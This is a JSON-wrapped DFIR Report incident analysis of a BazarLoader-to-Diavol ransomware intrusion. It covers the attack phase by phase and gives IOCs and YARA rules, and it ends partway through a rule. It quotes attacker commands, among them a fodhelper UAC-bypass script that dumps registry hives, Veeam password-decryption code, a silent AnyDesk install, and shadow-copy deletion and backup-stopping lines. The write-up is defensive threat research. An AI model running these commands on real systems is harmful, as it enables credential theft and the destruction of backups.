{
	"id": "6ee4e026-682d-4678-bffe-361bed698e3b",
	"created_at": "2026-04-06T00:10:47.574205Z",
	"updated_at": "2026-04-10T13:11:23.243394Z",
	"deleted_at": null,
	"sha1_hash": "3b407c56de2595ffddfc27a8e91ce2ded96d9b18",
	"title": "Diavol Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2850511,
	"plain_text": "Diavol Ransomware\r\nBy editor\r\nPublished: 2021-12-13 · Archived: 2026-04-05 14:30:14 UTC\r\nIn the past, threat actors have used BazarLoader to deploy Ryuk and Conti ransomware, as reported on many occasions. In this intrusion, however, a BazarLoader infection resulted in the deployment of Diavol Ransomware. First discovered in June 2021 by FortiGuard Labs, Diavol Ransomware is suspected to be linked to the Wizard Spider threat actor. In this report, we observed threat actors deploy multiple Cobalt Strike DLL beacons, perform internal discovery using Windows utilities, execute lateral movement using AnyDesk and RDP, dump credentials in multiple ways, exfiltrate data and deploy domain-wide ransomware in as little as 32 hours from initial access.\r\nCase Summary\r\nThe malware (BazarLoader) was delivered to an endpoint via an email that included a link to OneDrive. The OneDrive link directed the user to download a zip file, which contained an ISO. Once opened (mounted) on the user's system, the ISO was found to contain a LNK file and a DLL. The LNK file masqueraded as a document, enticing the user to click/open it. Once the user executed the LNK file, the BazarLoader infection was initiated.\r\nAs seen in previous cases, the BazarLoader infection began with internal reconnaissance of the environment using Windows utilities such as net, nltest, and ipconfig. After being inactive for one hour, the intrusion continued with the dropping of multiple Cobalt Strike beacon DLLs on the beachhead. This was followed by another round of discovery from the compromised machine. The threat actor then proceeded to execute adf.bat, a script that queries various Active Directory objects using the AdFind tool. The first run used a renamed binary named qq.exe; the threat actor later dropped a properly named AdFind binary and executed the same discovery commands again. 
Soon after that, using another simple batch script named fodhelper_reg_hashes.bat, they acquired credentials by dumping the SAM, SECURITY and SYSTEM registry hives.\r\nReturning after a gap of almost 18 hours, the threat actor performed another round of network scanning from the beachhead. This was followed by attempts to Kerberoast and “AS-REProast” using the tool Rubeus. The threat actor then moved laterally via RDP to a server that contained file shares. After gaining access to the system, they installed a remote access application, AnyDesk, as well as FileZilla.\r\nThe threat actors used FileZilla to exfiltrate data out of the environment. They then pivoted towards critical systems, such as domain controllers and a server that held backups. The threat actor dumped LSASS from one of the domain controllers using Task Manager, and then uploaded the dump file to ufile.io using Internet Explorer.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 1 of 38\n\nOn the backup server, the threat actors attempted to dump databases associated with the backup solution. In one attempt, they used a documented technique to recover the encoded password and decode it using the Microsoft Data Protection API (DPAPI).\r\nAround 42 hours after the initial intrusion, the threat actors pushed towards completion of their final objective. RDP access was established from the compromised central file server to all endpoints, and a batch script named “kill.bat” was executed on all of the targeted machines.\r\nThe script consists of commands that remove Volume Shadow Copies, disable Windows automatic startup repair, and stop all running services on the host. Once the script completed execution, the Diavol Ransomware was deployed via the RDP connection on each machine by running the executable manually. 
From initial access to ransomware deployment, the threat actors took about 42 hours to deploy ransomware domain-wide, but from the login on the third day to the last host ransom execution, only about an hour passed for the actors to finish their deployment.\r\nServices\r\nWe offer multiple services, including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here.\r\nWe also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @yatinwad and AnonymousContributor1\r\nReviewed by @tas_kmanager and @samaritan_o\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access was via a OneDrive link that arrived in malicious emails, as reported by @ankit_anubhav. Upon accessing the link, a zip file was downloaded.\r\nThe original URL of the file can also be traced from the file stream log data (Sysmon Event ID 15).\r\nReviewing the file stream data from Sysmon, we can see that the zip contains an ISO file.\r\nTheAnalyst reported similar BazarLoader activity via malicious emails around the same time frame.\r\nExecution\r\nThe BazarLoader ISO downloaded from the OneDrive link consists of a malicious DLL and a shortcut file named “Documents.lnk” which executes the DLL via rundll32.exe.\r\nAfter the initial execution, the malware contacted two of its C2 IPs:\r\n159.223.31.75\r\n206.189.49.239\r\nWe then observed 
threat actors dropping multiple Cobalt Strike Beacon DLLs on the host in the following file paths:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tfpkuengdlu.dll\r\nC:\\ProgramData\\temp.dll\r\nC:\\Users\\\u003c\u003e\\AppData\\Local\\Temp\\uvvfvnnswte.dll\r\nPersistence\r\nA new BITS job named “Microsoft Office Manager upgrade v24.24” was created on the beachhead host.\r\nThe BITS job failed because the requested URL does not exist.\r\nWhile reporting failure in the logs, the BITS job did re-execute the mounted ISO files every 3 hours for the length of the intrusion on the beachhead host.\r\nAfter the threat actor moved laterally, we observed them installing AnyDesk on multiple clients to create additional means of keeping access.\r\nThey used PowerShell and cmd to automate the download and installation of AnyDesk. In order to install AnyDesk for unattended access, you have to set a password. The password here was set to J9kzQ2Y0qO\r\n(new-object System.Net.WebClient).DownloadFile(\"http://download.anydesk.com/AnyDesk.exe\", \"C:\\ProgramData\\AnyDe\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent\r\ncmd.exe /c echo J9kzQ2Y0qO | C:\\ProgramData\\anydesk.exe --set-password\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --get-id\r\nThe threat actor not only leaked their password when installing AnyDesk, but also temporarily copied the password to the machine as the name of a text file.\r\nThis password also matches one from the leaked Conti manuals back in August.\r\nFrom the AnyDesk logs, we can also see the Client-ID and the IP used to access the clients. 
Logs can be found at\r\n%programdata%\\AnyDesk\\ad_svc.trace\r\nIP: 23.106.215.31, Client-id: 903491377\r\nDefense Evasion\r\nThe threat actors made use of process injection throughout the intrusion. The BazarLoader malware injected into an Edge browser process, as observed from the discovery activity and the Cobalt Strike DLLs' activity.\r\nCobalt Strike processes were also observed injecting into various other processes.\r\nCredential Access\r\nThreat actors dumped the SAM, SECURITY and SYSTEM registry hives using a batch script named “fodhelper_reg_hashes.bat”. The script relies on the well-known fodhelper.exe UAC bypass: each reg.exe save command is registered under the HKCU ms-settings handler so that it runs from an elevated context when fodhelper.exe is launched.\r\nContents of fodhelper_reg_hashes.bat are as follows:\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\sam c:\\ProgramData\\s\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\security c:\\ProgramDa\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\system c:\\ProgramData\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe delete hkcu\\software\\classes\\ms-settings /f \u003enul 2\u003e\u00261\r\nThey also enumerated web browser information using more.\r\nThe following files were accessed:\r\nUsers\\\u003c\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login 
Data\r\nUsers\\\u003c\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies\r\nC:\\Users\\\u003c\u003e\\AppData\\Local\\Temp\\edge-cookies.json\r\nUsing a well-known technique documented on the Veeam backup forum, the threat actor managed to decrypt passwords used by Veeam. The encryption method used by Veeam is the Data Protection API (DPAPI).\r\nAll the activity was done using RDP on the server with backups.\r\n1. Dump the credentials (base64-encoded passwords) using sqlcmd.exe.\r\n\"C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\sqlcmd.exe\" -S localhost,51341 -E -y0 -Q\r\n2. Via RDP and Notepad, they created a new file containing the code for the decryption routine.\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Windows\\Microsoft.NET\\Framework\\\u003cversion#\u003e\\veeam1.cs.txt\r\nContent of veeam1.cs.txt:\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Security.Cryptography;\r\nusing System.Text;\r\nnamespace Main\r\n{\r\n    internal static class Program\r\n    {\r\n        // Base64-decodes a DPAPI blob, unprotects it and prints it next to its label\r\n        private static void Decrypt(string b, string a)\r\n        {\r\n            if (string.IsNullOrEmpty(a))\r\n            {\r\n                return;\r\n            }\r\n            byte[] encryptedData = Convert.FromBase64String(a);\r\n            Console.WriteLine(b + ':' + Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectio\r\n            return;\r\n        }\r\n        private static void Main(string[] args)\r\n        {\r\n            Decrypt(\"VATA\", \"\u003cBASE64 ENCODED PASSWORD HASH\u003e\");\r\n        }\r\n    }\r\n}\r\n3. 
Compile (with csc.exe) and execute it, which gave the threat actors the passwords used by Veeam.\r\nc:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe veeam1.cs.txt\r\nWe also observed the threat actor using Rubeus to Kerberoast and AS-REP roast the environment.\r\nDiscovery\r\nBazarLoader was observed executing the well-known battery of Windows discovery commands around 10 minutes after execution on the beachhead host.\r\nnet group /domain admins\r\nnet group \"Domain Computers\" /domain\r\nnet localgroup administrator\r\nnet view /all\r\nnltest /domain_trusts /all_trusts\r\nShortly after the Cobalt Strike beacon was executed, we can see that they uploaded and ran the well-known script adf.bat. This has been observed multiple times by different ransomware groups. The threat actor ran AdFind twice, once using the adf.bat file with AdFind renamed to qq.\r\nqq.exe -f \"(objectcategory=person)\"\r\nqq.exe -f \"objectcategory=computer\"\r\nqq.exe -f \"(objectcategory=organizationalUnit)\"\r\nqq.exe -sc trustdmp\r\nqq.exe -subnets -f (objectCategory=subnet)\r\nqq.exe -f \"(objectcategory=group)\"\r\nqq.exe -gcb -sc trustdmp\r\nThe second time, they copy/pasted commands from adf.bat and executed them with AdFind.exe.\r\nOn the second day, the following commands were executed before they started working on moving laterally in the domain.\r\nnet group \"Domain Admins\" /domain\r\nwhoami\r\nnslookup\r\nipconfig /all\r\nsysteminfo\r\ntasklist\r\nnet group \"Enterprise admins\" /domain\r\nnet localgroup administrators\r\nwhoami /all\r\nnet use\r\nquery user\r\nDuring the course of the intrusion, we observed execution of the utility “Advanced IP Scanner” to perform network scanning (over ports 21, 80, 445, 4899, 8080).\r\nAdvanced IP Scanner was downloaded using Internet Explorer on a server:\r\nand then run with the portable option:\r\nWe 
also saw “MSSQLUDPScanner.exe” used for discovery of MSSQL instances across the environment. We believe the tool used is rvrsh3ll’s MSSQLUDPScanner.\r\nComparing compiled version to executable from this intrusion\r\nBefore execution of AdFind.exe, adf.bat was run.\r\nVia RDP, they manually ran @carlos_perez’s Invoke-Sharefinder.ps1 on a server. It then looks like they manually copied the output to a file named shares.txt.\r\nAfter each RDP connection to a server on the second day, the threat actor also made sure to open Task Manager to review running processes and possibly logged-in users on these systems.\r\nLateral Movement\r\nWe observed the threat actor using RDP as their main tool for lateral movement in the environment, most likely using credentials gathered through dumping of either LSASS or the registry hives. The first instance was through the beachhead, where they used Cobalt Strike as a reverse proxy. 
This also revealed their workstation name, which is WIN-799RI0TSTOF.\r\nAfter they installed AnyDesk, they used that access to RDP to other servers in the environment, as well as eventually executing their final objective using this access.\r\nCollection\r\nThe threat actors attempted to dump a database using sqlcmd.exe, but the connection to the MSSQL server failed.\r\nsqlcmd -E -S localhost -Q \"BACKUP DATABASE master TO DISK='c:\\programdata\\sql\\master.bak'\"\r\nCommand and Control\r\nBazarLoader:\r\n206.189.49.239:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: 3f48aac872b1dbe54fa3547535ec9d43\r\nCertificate: [3d:c3:4b:ff:95:d0:ae:52:f3:1e:18:e2:18:9e:0b:38:8c:f0:cf:b9 ]\r\nNot Before: 2021/10/18 14:47:32 UTC\r\nNot After: 2022/10/18 14:47:32 UTC\r\nIssuer Org: Akdeniz Ltd.\r\nSubject Common: turkcell.info\r\nSubject Org: Akdeniz Ltd.\r\nPublic Algorithm: id-ecPublicKey\r\nCurve: prime256v1\r\nSubject: \"emailAddress=goodmanshannon@stewart-cook.com,CN=turkcell.info,O=Akdeniz Ltd.,L=\\\\C3\\\\83\\\\C2\\\\87orlubu\r\nIssuer: \"emailAddress=goodmanshannon@stewart-cook.com,CN=turkcell.info,O=Akdeniz Ltd.,L=\\\\C3\\\\83\\\\C2\\\\87orluburg\r\nValidation_status: \"self signed certificate\",\r\n159.223.31.75:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: 3f48aac872b1dbe54fa3547535ec9d43\r\nCertificate: [be:b3:98:a3:a2:ce:e0:63:0b:7a:02:34:13:5b:0a:b5:4a:a4:21:71 ]\r\nNot Before: 2021/10/18 14:47:32 UTC\r\nNot After: 2022/10/18 14:47:32 UTC\r\nIssuer Org: Şafak Fırat Ltd.\r\nSubject Common: masomo.com\r\nSubject Org: Şafak Fırat Ltd.\r\nPublic Algorithm: id-ecPublicKey\r\nCurve: prime256v1\r\nCobalt Strike C2:\r\nhiduwu.com\r\n108.62.141.87:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: 
ae4edc6faf64d08308082ad26be60767\r\nCertificate: [a5:4e:ed:32:cd:76:a3:97:6b:ad:a1:df:42:36:6d:38:54:4c:a5:4e ]\r\nNot Before: 2021/09/29 00:00:00 UTC\r\nNot After: 2022/09/29 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: hiduwu.com [hiduwu.com ,www.hiduwu.com ]\r\nPublic Algorithm: rsaEncryption\r\ngawocag.com\r\n23.81.246.32:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [32:be:aa:28:c6:bc:f3:f6:cf:31:c5:e5:2a:bf:1a:c1:a4:70:d1:6b ]\r\nNot Before: 2021/10/11 00:00:00 UTC\r\nNot After: 2022/10/11 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: gawocag.com [gawocag.com ,www.gawocag.com ]\r\nPublic Algorithm: rsaEncryption\r\nExtracted beacon configuration:\r\n{\r\n\"x64\": {\r\n\"sha256\": \"0cb20cf74f9c5896442c82f875e9221cae606ffa124e53d013b8d13b6988f8cc\",\r\n \"uri_queried\": \"/fVWJ\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"C2 Host Header\": \"\",\r\n \"HTTP Method Path 2\": \"/sm\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Method 2\": \"POST\",\r\n \"C2 Server\": \"gawocag.com,/nd\",\r\n \"Jitter\": 10,\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"sha1\": \"72db453ad1ab5ea483e5046864f3a8c295e7fef4\",\r\n \"time\": 1634637833485.8,\r\n \"md5\": \"abd213722fae891f54c28640d751200f\"\r\n },\r\n \"x86\": {\r\n \"sha256\": \"b08ae2fec4c0c64113947c14d9ab6f4a3e61a9d60e182b59e20b5b3606df8569\",\r\n \"uri_queried\": \"/C5jz\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"C2 Host Header\": \"\",\r\n \"HTTP Method Path 2\": \"/sm\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Method 2\": \"POST\",\r\n \"C2 
Server\": \"gawocag.com,/nd\",\r\n \"Jitter\": 10,\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"sha1\": \"f3003f34c9cb595e94fa632b537bf5a76869954d\",\r\n \"time\": 1634637826726,\r\n \"md5\": \"3303703eef699663fd3f0982922e8e30\"\r\n }\r\n}\r\nExfiltration\r\nOn the second day of the intrusion, FileZilla was installed on one of the servers and used SFTP to exfiltrate data to a remote computer at IP address 192.52.167.210.\r\nUsing NetFlow, we were able to confirm that some amount of data (~200MB) was exfiltrated out of the environment.\r\nHere we can see the threat actor actively exfiltrating information using FileZilla.\r\nWe also saw the threat actors exfiltrate databases by dragging and dropping information into FileZilla.\r\nAfter pivoting to a Domain Controller, the threat actors dumped LSASS using Task Manager, and then uploaded the dump file to ufile.io using Internet Explorer on a server.\r\nImpact\r\nOn the third day, the threat actors began their final actions, which took place from a compromised file server. They began with a ping sweep to locate all live hosts. After that completed, they reviewed the results on the host.\r\nFrom the file server, the threat actors then established RDP connections to all the machines in the environment. The threat actors transferred two files onto the machines they connected to: a batch script named kill.bat and a ransomware executable, CryptoLocker64.exe.\r\nThe batch script is responsible for deleting volume shadow copies, turning off automatic repairs and stopping all running services on the host. 
Some of the commands are as follows:\r\nsc config \"Netbackup Legacy Network service\" start= disabled\r\nbcdedit /set {default}\r\nbcdedit /set {default} recoveryenabled No\r\nvssadmin.exe Delete Shadows /all /quiet\r\nwmic.exe Shadowcopy Delete\r\nnet stop \"Zoolz 2 Service\" /y\r\nnet stop \"Veeam Backup Catalog Data Service\" /y\r\nnet stop \"Symantec System Recovery\" /y\r\nnet stop \"SQLsafe Filter Service\" /y\r\nnet stop \"SQLsafe Backup Service\" /y\r\nnet stop \"SQL Backups\" /y\r\nnet stop \"Acronis VSS Provider\" /y\r\nnet stop VeeamDeploySvc /y\r\nnet stop BackupExecVSSProvider /y\r\nnet stop BackupExecRPCService /y\r\nnet stop BackupExecManagementService /y\r\nnet stop BackupExecJobEngine /y\r\nnet stop BackupExecDeviceMediaService /y\r\nAfter completion of this activity, the ransomware binary was executed manually over the RDP connections.\r\nFrom the threat actors starting their ping sweep to final host encryption, about an hour passed, leaving behind the ransom note for the organization to find. 
The threat actors went from initial access to domain-wide ransomware in just under two days.\r\nIOCs\r\nNetwork\r\nBazarLoader\r\nturkcell[.]info\r\n159.223.31[.]75\r\n206.189.49[.]239\r\nCobalt Strike\r\n23.81.246[.]32\r\ngawocag.com\r\n108.62.141[.]87\r\nhiduwu.com\r\nSFTP Exfiltration\r\n192.52.167[.]210\r\n23.152.0[.]22\r\nFile\r\nBazar\r\nDocuments.lnk\r\nSharedFiles.dll\r\nCobalt Strike\r\nuvvfvnnswte.dll\r\ntmp.dll\r\nTools\r\nAdFind.exe\r\nRubeus.exe\r\nfodhelper_reg_hashes.bat\r\nMSSQLUDPScanner.exe\r\nveeam1.cs.exe\r\nAnyDesk.exe\r\nFileZillaPortable.exe\r\nDetections\r\nNetwork\r\nSnort:\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET INFO Packed Executable Download\r\n[1:2850280:1] ETPRO TROJAN Observed Malicious SSL Cert (BazaLoader CnC) [Classification: A Network Trojan was De\r\nSigma\r\nRules generated by @0xThiebaut’s sigmai project:\r\nAdFind Usage Detection\r\nGrabbing Sensitive Hives via Reg Utility\r\nCredentials Dumping Tools Accessing LSASS Memory\r\nSuspicious Reconnaissance Activity\r\nStop Windows Service\r\nAnyDesk Silent Installation\r\nRubeus Hack Tool\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-12-12\r\n Identifier: files\r\n Reference: 8099 https://thedfirreport.com/\r\n*/\r\n/* Rule Set 
----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule uvvfvnnswte {\r\n meta:\r\n description = \"8099 - file uvvfvnnswte.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d\"\r\n strings:\r\n $s1 = \"(s#u%x0m(m#n\u0026y*r$o\u0026k\\\"j*o$y\u0026x\\\"k)l#k%y!l)y#u%j0m%v0w)w.n%k0q)l.o\u0026p/s*m-p\u0026u/m*v.q+j%o\u0026s%r+w%y\u0026p%s,t\u0026\r\n $s2 = \"0w(r#v%l0j(l$u\\\"o*u$n\u0026p\\\"v*p$x\u0026k!q)k#j%r!x)v#t,y.k%y0v)t.r%l0p)w-m\u0026o/r*n-t\u0026r/l)m%w+m%n\u0026x%n+x%x\u0026s\u0026y,\r\n $s3 = \"%r0v(y#p%k0k'w\u0026m\\\"p*t$m\u0026v\\\"y*q$k%w!n)j#q%l!w)w.o)y.l%x0u)j.u%m0s*k-j\u0026n/y*x-s\u0026s0w\u0026u%x+l%m\u0026n%q+y%k%o\u0026\r\n $s4 = \"#t%s0u(j#o%j/x$p\u0026j\\\"q*w$v\u0026y\\\"x*r#l%x!o)q#r%k!v(l0x)v.m%s0n)m.t%v/t*l-k\u0026m/j*w-r%p%p\u0026r%y+o%v\u0026q%p+j\u0026l%\r\n $s5 = \"#s+r+y+x/o#k,q$l$t%q0x$u.s*j,s0l(r\u0026r,u0y*p%s!y-y%v'l\u0026v%l%o-q+o%s!k-m)l!p-n!r(q(l.t)p\\\"o+s%k\u0026v'j*v#w\r\n $s6 = \"%y\u0026u\u0026x!s%k%t%j%m\\\"p\u0026m\u0026k%o%n\\\"m%l\u0026v%t%s\\\"r%q\u0026u%y,l/o)u+p0q)y)p)q)r-y)m+x-o,u,t/u*s,n+l+k0j,t,m+q+t0w\r\n $s7 = \"-r#u\u0026p.w+l#r,o%w%x%y$n%y-j,u$y(y,s,r,y$w%n-n%v-q)l%l%q%p-r!o/n+k\\\"r,q)q#r!s(o%l#p\u0026s\\\"r.n*q\u0026q.k*u#y+\r\n $s8 = \",j/j#t(v+l#s.s%w%x%y0x$o%v%u-x,j0t$j/m+n%l$k!k\\\"l+t-q!p-x\u0026y+v/l%q%s%r0n'v%w%v\u0026m,u$w+y+r+s*s*r*q*p*o\r\n $s9 = \",n0m%s$s(j0n(q#m*v0p.x0q't0w)v)x)y/m-s(y%o\u0026m%n,w0t/l#x(r*k+p)k%p0k,v(k$w!t%j*w#x,k(o!y%y#w,j\\\"l\u0026s(w\r\n $s10 = \"(l/j#l0u$t/n$x0y!p0n$v(k\u0026w,p,t,t,s$w(y-u*u!o,q%m%k%j,r\u0026m0l.s%t%t,p)u-v,o\u0026s$j)s+w%n0l-t\u0026q\u0026o/w%y\u0026t\u0026s\r\n $s11 = \"/k#u'u)x0l'y(y0t$l\u0026v*y%s+j$t#p,t,s$w(y-u,o%m\u0026p0p.w%j%q+w%q(q)u-y)s$v%m-o)o+n!l-t+x+y.n*x+t,y\u0026s's*s\r\n $s12 = 
\"\u0026q+v.s)m/v#y%w,q,x$o/q,q,o,n,n!n0n.y0u$o%t%m)t%w-o%p%p%p%o,u)l%o-v(k%x%x%w)u\\\"p)o+x+x\u0026q\u0026p,v+u\u0026u\u0026t\u0026\r\n $s13 = \"+s+r/q*o*j0l,y,j,k-n+w0x$r,k.x,p,u,r0q)o%o-r%w-k(x%j$l%y!w-y)n+l$p\\\"q%y%x.w0o\u0026y\u0026l\u0026k\u0026j,y0x%q\u0026n\u0026u\\\"l\r\n $s14 = \"+s%j/t)s+w+v(y!u,j,j,q,p\u0026w)x*v,t,s(n(m0p$p,s,x+p%m%j)n!x-x%k,p+x%u%r!m#w)y!k\u0026j*l\\\"m\u0026y%q\u0026l*o\\\"v.j*u\r\n $s15 = \"/v*u'y*w(y*y(t\u0026t-x%y%r%s0w$q(y)l(t(n(m0p$x\u0026j'u0u\u0026p%j%q%p+w\\\"n)l%t%s-w)y$t%t0o\u0026p\u0026l\u0026k\u0026j*t(y\\\"n/v\u0026t\u0026t\r\n $s16 = \"'s%k/m\u0026k\u0026l\u0026m0u$s(m0s*n(n0v)y(r-w,y%u,j.k,y\u0026q'r!t-t)t%r\\\"k)o!o0l\u0026t%s%r%y!x-q*u$o\u0026w#l)r\u0026p\u0026s/u*p$w\u0026o'\r\n $s17 = \"\\\"k+m+y+x+w'y(y0t$l\u0026v*y0t$x(w$j0m-s\u0026j(l%k%l%m-p)l$n\u0026p!x#o!n$n!q-q\u0026v\\\"t%j%t%w!o.r*u\\\"s*k,q\u0026k\\\"q+u%y\r\n $s18 = \"(k%m+w*w(p#s'r-p+n\u0026r0t-o%t%u$l+l\u0026k!x-v%k%l(u%m%u%k%j%q-o)x,u-j)o+k't,j,k,l-q*j,s%l,r-t#o+t+u*v\u0026t\u0026j\r\n $s19 = \"$t#j/v)l%w#n0j!u'k(j$y0w+v!j%r%s,j%k(n!j's%y.k%t)t%m\\\"q0s-n)q#y!r!s%j)l\u0026v!s$q\\\"r'x0y\u0026r*v\u0026w!o0v)x!v\r\n $s20 = \"#t%n)y/q#p(n$r%j0r)u(y-l+o0v$j's\u0026k)t\u0026q%k%l$s)m%w-n0l%q%p%o0v.r'x!j.t,r+j-j(j%o.s%l*k+r\u0026l+t*p.j*w*r\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n ( pe.imphash() == \"1a4ea0d6f08424c00bbeb4790cdf1ca7\" and ( pe.exports(\"GhlqallxvchxEpmvydvyzqt\") and pe.ex\r\n}\r\nrule files_Rubeus {\r\n meta:\r\n description = \"8099 - file Rubeus.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb\"\r\n strings:\r\n $x1 = \" Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/\r\n $x2 = \" Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD 
[/enctype:DES|RC4|AES128|AES256] | /des:HA\r\n $x3 = \"[!] GetSystem() - OpenProcessToken failed!\" fullword wide\r\n $x4 = \" Rubeus.exe createnetonly /program:\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" [/show]\" fullword wide\r\n $x5 = \"[!] GetSystem() - ImpersonateLoggedOnUser failed!\" fullword wide\r\n $x6 = \"[X] You need to have an elevated context to dump other users' Kerberos tickets :( \" fullword wide\r\n $x7 = \"[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'\" fullword wide\r\n $x8 = \" Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific\r\n $s9 = \"Z:\\\\Agressor\\\\github.com-GhostPack\\\\Rubeus-master\\\\Rubeus\\\\obj\\\\Debug\\\\Rubeus.pdb\" fullword ascii\r\n $s10 = \" Triage all current tickets (if elevated, list for all users), optionally targeting a specific\r\n $s11 = \"[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\" fullword wide\r\n $s12 = \"Action: Dump Kerberos Ticket Data (All Users)\" fullword wide\r\n $s13 = \"[*] Initializing Kerberos GSS-API w/ fake delegation for target '{0}'\" fullword wide\r\n $s14 = \"[*] Listing statistics about target users, no ticket requests being performed.\" fullword wide\r\n $s15 = \"[X] OpenProcessToken error: {0}\" fullword wide\r\n $s16 = \"[X] CreateProcessWithLogonW error: {0}\" fullword wide\r\n $s17 = \"[*] Target service : {0:x}\" fullword wide\r\n $s18 = \"[*] Target Users : {0}\" fullword wide\r\n $s19 = \" Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:US\r\n $s20 = \" List all current tickets in detail (if elevated, list for all users), optionally targeting a s\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule SharedFiles {\r\n meta:\r\n description = \"8099 - file SharedFiles.dll\"\r\n author = \"The DFIR 
Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299\"\r\n strings:\r\n $s1 = \"ButtonSkin.dll\" fullword wide\r\n $s2 = \"MyLinks.dll\" fullword wide\r\n $s3 = \"DragListCtrl.dll\" fullword ascii\r\n $s4 = \"whoami.exe\" fullword ascii\r\n $s5 = \"constructor or from DllMain.\" fullword ascii\r\n $s6 = \"DINGXXPADDINGPADDINGXXPADDINGPADD\" fullword ascii\r\n $s7 = \"kLV -{T\" fullword ascii\r\n $s8 = \"CtrlList1\" fullword wide\r\n $s9 = \"CtrlList2\" fullword wide\r\n $s10 = \"CtrlList3\" fullword wide\r\n $s11 = \"wox)YytbACl_\u003cme*y3X(*lNCvY@8jsbePLfVHH!X2p2TdHa6+1hoo^1N7gNtwhki)Lbaso@*ne7\" fullword ascii\r\n $s12 = \"QX[gbL\" fullword ascii /* Goodware String - occured 1 times */\r\n $s13 = \"BasicScore\" fullword ascii\r\n $s14 = \".?AVCDemoDlg@@\" fullword ascii\r\n $s15 = \"jLDfSektRC2FrOiWNzhbH3AsmBEIwg1U\" fullword ascii\r\n $s16 = \"9t$xt5\" fullword ascii /* Goodware String - occured 1 times */\r\n $s17 = \"DeAj1=n\" fullword ascii\r\n $s18 = \"WmaK|IG\" fullword ascii\r\n $s19 = \"oTRHz`R\" fullword ascii\r\n $s20 = \"VWATAUAVAWLc\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and 